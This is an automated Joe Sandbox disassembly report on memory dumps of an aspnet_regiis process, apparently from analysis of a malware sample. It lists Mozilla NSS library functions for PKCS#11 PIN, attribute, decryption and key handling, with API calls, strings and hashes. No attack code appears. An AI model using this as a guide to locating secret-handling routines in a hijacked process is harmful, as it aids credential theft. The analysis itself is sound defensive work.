Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: e40642f4981856004c4bcf5d439d1f836fe0115f662b94931c56b8858386ef6f
Instruction ID: 9f3d17cea0371de97b960b9d98e64df98724c95695728c10316b6ff597da9630
Opcode Fuzzy Hash: e40642f4981856004c4bcf5d439d1f836fe0115f662b94931c56b8858386ef6f
Instruction Fuzzy Hash: ACA10973A6A9804BE710C62CCC11F8833E1679337AF998375E931C6FD5DB39A461C245

Function 6C42E8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C42E853,?,FFFFFFFF,?,?,6C42B0CC,?,6C42B4A0,?,00000000), ref: 6C42E8D9

Part of subcall function 6C420D30: calloc.MOZGLUE ref: 6C420D50
Part of subcall function 6C420D30: TlsGetValue.KERNEL32 ref: 6C420D6D

Part of subcall function 6C42C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C42DAE2,?), ref: 6C42C6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C42E972
PORT_ArenaMark_Util.NSS3(?), ref: 6C42E9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C42EA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C42EA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C42EA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C42EA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C42EA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C42EACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C42EB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C42EBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C42EBEC
free.MOZGLUE(00000000), ref: 6C42EC58

Strings

SBl, xrefs: 6C42E9CA, 6C42EAAB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: SBl
API String ID: 759478663-2676013199
Opcode ID: bdf459270d88e0b6ef739dc0b7f73f494ef212ad90f9cbcad6246fe415ae5029
Instruction ID: 1541b92c66b650841b35a1666b8b058040ccece86a555c6a27f07a2030b9f2de
Opcode Fuzzy Hash: bdf459270d88e0b6ef739dc0b7f73f494ef212ad90f9cbcad6246fe415ae5029
Instruction Fuzzy Hash: 5BC173B1E012059BEB10CFA5D8C2FAA7BB4AF05319F150079E916A7B51E739E805CBD1

Function 6C3F4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C3F4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F4EC7

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C3F4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C3F4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C3F4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C3F4F68

Strings

hObject = 0x%x, xrefs: 6C3F4EF5, 6C3F4F05
pTemplate = 0x%p, xrefs: 6C3F4F4A
nMl, xrefs: 6C3F4F82, 6C3F4FB2
(CK_INVALID_HANDLE), xrefs: 6C3F4EC0, 6C3F4F13
ulCount = %d, xrefs: 6C3F4F63
C_GetAttributeValue, xrefs: 6C3F4E7E
hSession = 0x%x, xrefs: 6C3F4EA2, 6C3F4EB2

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nMl
API String ID: 1003633598-958569367
Opcode ID: ab82ec5b48a0be5accf3ca36a0d0ebe438cd9eeaa016ee6538ff5c4d0012ab66
Instruction ID: a4f8098f1c99dcf4bd5d21f02d0efe5b6ac646468f194ec074e8b9a61d947a8b
Opcode Fuzzy Hash: ab82ec5b48a0be5accf3ca36a0d0ebe438cd9eeaa016ee6538ff5c4d0012ab66
Instruction Fuzzy Hash: 8E410635602244AFEB00DF14DE48F9A77B5AB4231DF068828E41867B11D739A909CFAB

Function 6C3F4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C3F4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F4D37

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C3F4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C3F4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C3F4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C3F4E20

Strings

hObject = 0x%x, xrefs: 6C3F4D65, 6C3F4D75
*pulSize = 0x%x, xrefs: 6C3F4E1B
pulSize = 0x%p, xrefs: 6C3F4DB7
nMl, xrefs: 6C3F4DD4, 6C3F4DFF
(CK_INVALID_HANDLE), xrefs: 6C3F4D30, 6C3F4D83
C_GetObjectSize, xrefs: 6C3F4CEE
hSession = 0x%x, xrefs: 6C3F4D12, 6C3F4D22

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nMl
API String ID: 1003633598-742896798
Opcode ID: 642c408c135147bec300d41ec98b2beda0228a1529ccc21d6a62e128fd853d2d
Instruction ID: c8afc15443b0eb17172f279235addaa4e0f4ae592524910cacd078056ccb62af
Opcode Fuzzy Hash: 642c408c135147bec300d41ec98b2beda0228a1529ccc21d6a62e128fd853d2d
Instruction Fuzzy Hash: B2413A74601244AFEB00EF14DE98F6A37B5EB4231DF068829F4186BA12D7349849CFB7

Function 6C3F2F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C3F2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3F2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3F2F63

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3F2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C3F2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C3F2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C3F2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C3F2FE7

Strings

ulNewLen = %d, xrefs: 6C3F2FE2
pOldPin = 0x%p, xrefs: 6C3F2F95
ulOldLen = %d, xrefs: 6C3F2FB0
nMl, xrefs: 6C3F2FFF, 6C3F3030
(CK_INVALID_HANDLE), xrefs: 6C3F2F5C
C_SetPIN, xrefs: 6C3F2F21
hSession = 0x%x, xrefs: 6C3F2F3E, 6C3F2F4E
pNewPin = 0x%p, xrefs: 6C3F2FC9

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nMl
API String ID: 1003633598-3508300337
Opcode ID: 9df8c18f0d399919b3b8f43b0f17b709f5dd1c25a524296fbb77af2cf07d6bfb
Instruction ID: 404090d9041ead4e7dbddd0113bf604f8fd558114adc8cd10b71b1df736f0f42
Opcode Fuzzy Hash: 9df8c18f0d399919b3b8f43b0f17b709f5dd1c25a524296fbb77af2cf07d6bfb
Instruction Fuzzy Hash: 2631E375611284EFEB00DF14DE4CE8A3BF1EB8632DF0A4459E818A7A11D7359849CFA7

Function 6C3FA9A0 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6C3FA9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C3FA9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C3FAA03

Part of subcall function 6C4DD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4DD963

PR_LogPrint.NSS3(?,00000000), ref: 6C3FAA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C3FAA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C3FAA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6C3FAA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6C3FAA87

Strings

C_DecryptMessageBegin, xrefs: 6C3FA9C1
ulParameterLen = 0x%p, xrefs: 6C3FAA50
nMl, xrefs: 6C3FAA9F, 6C3FAAD3
(CK_INVALID_HANDLE), xrefs: 6C3FA9FC
ulAssociatedDataLen = 0x%p, xrefs: 6C3FAA82
hSession = 0x%x, xrefs: 6C3FA9DE, 6C3FA9EE
pParameter = 0x%p, xrefs: 6C3FAA35
pAssociatedData = 0x%p, xrefs: 6C3FAA69

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin$nMl
API String ID: 1003633598-2217302918
Opcode ID: 8c812c4d050127cecbd8e97fa97ee325e57abf84dbb946604103f80fe8322474
Instruction ID: 92b652dbe02f87efb1148c3afed192f71a57f442f2848393d5cba71ead242ae6
Opcode Fuzzy Hash: 8c812c4d050127cecbd8e97fa97ee325e57abf84dbb946604103f80fe8322474
Instruction Fuzzy Hash: E531F339601184AFDB00EF50DE48E9E3BF1EB4632DF464469E41867A11D7349849CFA6

Function 6C4528C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C455B40: PR_GetIdentitiesLayer.NSS3 ref: 6C455B56

TlsGetValue.KERNEL32 ref: 6C45290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C45291E
TlsGetValue.KERNEL32 ref: 6C452937
EnterCriticalSection.KERNEL32(00000001), ref: 6C45294B
PR_EnterMonitor.NSS3(?), ref: 6C452966
PR_EnterMonitor.NSS3(?), ref: 6C4529AC
PR_ExitMonitor.NSS3(?), ref: 6C4529D1
PR_EnterMonitor.NSS3(?), ref: 6C4529F0
PR_EnterMonitor.NSS3(?), ref: 6C452A15
PR_EnterMonitor.NSS3(?), ref: 6C452A37
PR_ExitMonitor.NSS3(?), ref: 6C452A61
PR_ExitMonitor.NSS3(?), ref: 6C452A78
PR_ExitMonitor.NSS3(?), ref: 6C452A8F
PR_ExitMonitor.NSS3(?), ref: 6C452AA6

Part of subcall function 6C489440: TlsGetValue.KERNEL32 ref: 6C48945B
Part of subcall function 6C489440: TlsGetValue.KERNEL32 ref: 6C489479
Part of subcall function 6C489440: EnterCriticalSection.KERNEL32 ref: 6C489495
Part of subcall function 6C489440: TlsGetValue.KERNEL32 ref: 6C4894E4
Part of subcall function 6C489440: TlsGetValue.KERNEL32 ref: 6C489532
Part of subcall function 6C489440: LeaveCriticalSection.KERNEL32 ref: 6C48955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C452AF9
free.MOZGLUE(?), ref: 6C452B16
PR_Unlock.NSS3(?), ref: 6C452B6D
PR_Unlock.NSS3(?), ref: 6C452B80

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: 2636fcbdcfbc73634cffa7f674f0d8a59c96006784d83323526c1978e6f26903
Instruction ID: ed8e8669597ae8cae420379e7bb248583af7423e79055d7f4971eb100d02b0be
Opcode Fuzzy Hash: 2636fcbdcfbc73634cffa7f674f0d8a59c96006784d83323526c1978e6f26903
Instruction Fuzzy Hash: 2381A3B5A00B019BEB20DF35EC49E97B7E5AF15308F54492DD85AC7B11EB32E528CB81

Function 6C418E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C418E01,00000000,6C419060,6C520B64), ref: 6C418E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C418E01,00000000,6C419060,6C520B64), ref: 6C418E9E
PORT_ArenaAlloc_Util.NSS3(6C520B64,00000001,?,?,?,?,6C418E01,00000000,6C419060,6C520B64), ref: 6C418EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C418E01,00000000,6C419060,6C520B64), ref: 6C418EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C418E01,00000000,6C419060,6C520B64), ref: 6C418ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C418E01,00000000,6C419060,6C520B64), ref: 6C418EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C418E01), ref: 6C418EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C520B64,6C520B64), ref: 6C418F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C418F3F

Part of subcall function 6C41A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C41A421,00000000,00000000,6C419826), ref: 6C41A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C41904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C418E76

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: b2919dce24e285a9676fe5df2655344571cbbcd090efd1677e825fa491ef26fa
Instruction ID: a85ec4915affd4ae02fd0fe94385357b995fd2ee1d268ae13df5c2c038252b66
Opcode Fuzzy Hash: b2919dce24e285a9676fe5df2655344571cbbcd090efd1677e825fa491ef26fa
Instruction Fuzzy Hash: 12619DB5E042069FDB10CF55CC80EBBBBB9EF94359F154128DC58A7B01E732A915CAE0

Function 6C3C8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3C8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C3C8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C3C8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C4F18D0,?), ref: 6C3C8F03
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C3C8F19
PL_FreeArenaPool.NSS3(?), ref: 6C3C8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C3C8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C3C8F65
PL_FinishArenaPool.NSS3(?), ref: 6C3C8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C3C8FFE
PR_CallOnce.NSS3(6C522AA4,6C4212D0), ref: 6C3C9012
PL_FreeArenaPool.NSS3(?), ref: 6C3C9024
PL_FinishArenaPool.NSS3(?), ref: 6C3C902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C3C903E

Strings

security, xrefs: 6C3C8EE7

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 97c0dac75658090b24693c9f3ec471852810347e3411fc75eebc2db920fbd0e6
Instruction ID: c2c2e6768b7e401d9ccce0725ac97607dc142781f80974e37b0cc4604ea90164
Opcode Fuzzy Hash: 97c0dac75658090b24693c9f3ec471852810347e3411fc75eebc2db920fbd0e6
Instruction Fuzzy Hash: E25109B1608340ABD710DA549C41FEF73E8AB8575CF45082EF95597B40D776EE088BA3

Function 6C48CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C48CC7B), ref: 6C48CD7A

Part of subcall function 6C48CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C3FC1A8,?), ref: 6C48CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C48CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C48CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C48CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C48CD8E

Part of subcall function 6C3B05C0: PR_EnterMonitor.NSS3 ref: 6C3B05D1
Part of subcall function 6C3B05C0: PR_ExitMonitor.NSS3 ref: 6C3B05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C48CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C48CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C48CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C48CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C48CE48

Strings

getnameinfo, xrefs: 6C48CDB2, 6C48CE23
wship6.dll, xrefs: 6C48CDE3
freeaddrinfo, xrefs: 6C48CD9F, 6C48CE10
getaddrinfo, xrefs: 6C48CD88, 6C48CDF9
ws2_32.dll, xrefs: 6C48CD75

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 3b16e6159780ab48761c0e4ee3628c6e27c5f42b72a289827d5a76b131cde5e4
Instruction ID: 40ba0cb1f8baa7fc3b1e1f7c08dbd2b257168248174b55de6912559272778257
Opcode Fuzzy Hash: 3b16e6159780ab48761c0e4ee3628c6e27c5f42b72a289827d5a76b131cde5e4
Instruction Fuzzy Hash: 911103E5E0355157EB11FAB16D00EAF38D95B9300EF184635E815E2F00FB25D9098AFB

Function 6C430C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,Cl), ref: 6C430C81

Part of subcall function 6C41BE30: SECOID_FindOID_Util.NSS3(6C3D311B,00000000,?,6C3D311B,?), ref: 6C41BE44

Part of subcall function 6C408500: SECOID_GetAlgorithmTag_Util.NSS3(6C4095DC,00000000,00000000,00000000,?,6C4095DC,00000000,00000000,?,6C3E7F4A,00000000,?,00000000,00000000), ref: 6C408517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C430CC4

Part of subcall function 6C41FAB0: free.MOZGLUE(?,-00000001,?,?,6C3BF673,00000000,00000000), ref: 6C41FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C430CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C430D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C430D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C430D7D
free.MOZGLUE(00000000), ref: 6C430DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C430DC1
free.MOZGLUE(00000000), ref: 6C430DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C430E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C430E0F

